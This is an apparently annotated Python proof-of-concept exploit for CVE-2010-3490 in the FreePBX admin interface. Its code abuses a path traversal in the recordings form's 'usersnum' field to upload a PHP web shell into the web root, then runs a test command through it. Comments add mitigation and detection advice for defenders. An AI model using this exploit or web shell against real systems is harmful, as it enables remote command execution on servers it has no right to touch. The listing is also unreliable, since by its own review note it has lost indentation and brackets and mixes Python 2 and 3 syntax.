EXP
import requests
import random
import string
import sys
# Original advisory : http://www.exploit-db.com/exploits/15098/
#
# Proof-of-concept for CVE-2010-3490 in the FreePBX admin interface (the
# banner below gives the affected range as <= 2.8.0). Every request is sent
# with HTTP auth credentials, so the issue is reached only after an
# administrator login.
# NOTE(review): this listing appears to have lost its indentation and some
# bracket characters in extraction, and it mixes Python 2 constructs (xrange,
# the print statement) with print() calls; it does not run as shown.
#
# What the script demonstrates, for defenders:
#   * the "usersnum" field of the recordings form carries "../" sequences and
#     an absolute-looking path into the admin web directory;
#   * the follow-up request targets "<keyword>-ivrrecording.php" under the
#     admin URL, which implies the server builds the saved file name from
#     "usersnum" without restricting it to a plain extension number;
#   * the uploaded body is PHP, so a file written there is executed by the
#     web server when requested.
# Mitigation: run a FreePBX release newer than the affected range, keep the
# admin interface off untrusted networks, and make sure upload/recording
# code accepts only numeric "usersnum" values and never writes inside an
# executable web path.
# Detection: look for POSTs to config.php?type=setup&display=recordings whose
# "usersnum" contains path separators, for unexpected "*-ivrrecording.php"
# files in the admin directory, and for GETs to such files with a "cmd"
# query parameter.
print("devloop exploit for FreePBX <= 2.8.0 (CVE-2010-3490)")
# Expects exactly three arguments: admin URL, username, password.
if len(sys.argv) != 4:
print("Usage: {0} <url_to_freepbx_admin_directory> <username> <password>")
sys.exit()
BASE = sys.argv1
USER = sys.argv2
PASS = sys.argv3
# Fixed keyword used as the stem of the file name written on the server; it
# is a constant of this PoC and therefore a usable indicator for this exact
# script, but trivially changed by anyone editing it.
KEYW = "devloop"
# Normalise the base URL so later string concatenation yields valid paths.
if not BASE.endswith("/"):
BASE += "/"
sess = requests.session()
creds = (USER, PASS)
# Login check: fetch the admin page with HTTP auth and look for the
# "Logged in:" marker in the response body.
r = sess.get(BASE + "config.php", auth=creds)
if "Logged in:" in r.content:
print("+ Connection successful")
else:
print("! Unable to login... check credentials and url")
sys.exit()
# Form fields for the "recordings" page.
data = {
'action': 'recorded',
'display': 'recordings',
# The traversal: a field that presumably should hold an extension number
# instead holds a relative path climbing out of the recordings directory.
'usersnum': '../../../../../var/www/html/admin/{0}'.format(KEYW),
# Random 10-character label per run, so the recording name is not a stable
# indicator.
'rname': "".join(random.choice(string.hexdigits) for _ in xrange(10)),
'Submit': 'Save'
}
# Uploaded body: PHP that passes a request parameter to system(). Any file
# with this shape under the web root should be treated as a web shell.
content = "<?php system($_GET'cmd'); ?>"
# Multipart part named "ivrfile", declared as application/octet-stream with a
# .php client-side file name.
files = {
'ivrfile': ('backdoor.php', content, 'application/octet-stream')
}
# Referer is set to the recordings page itself; presumably the application
# checks it, TODO confirm against the FreePBX source.
hdrs = {"referer": BASE + "config.php?type=setup&display=recordings"}
r = sess.post(BASE + "config.php?type=setup&display=recordings",
data=data,
files=files,
auth=creds,
headers=hdrs)
# Verification step: request the file name the script expects the server to
# have written and report the HTTP status. Note this call uses requests.get
# directly rather than the session created above.
print("i Testing shell at address {0}{1}-ivrrecording.php".format(BASE, KEYW))
r = requests.get(BASE + KEYW + "-ivrrecording.php?cmd=uname+-a", auth=creds)
if r.status_code != 200:
print("- Received HTTP code {0} for this url".format(r.status_code))
else:
print("HTTP 200 OK")
print r.content
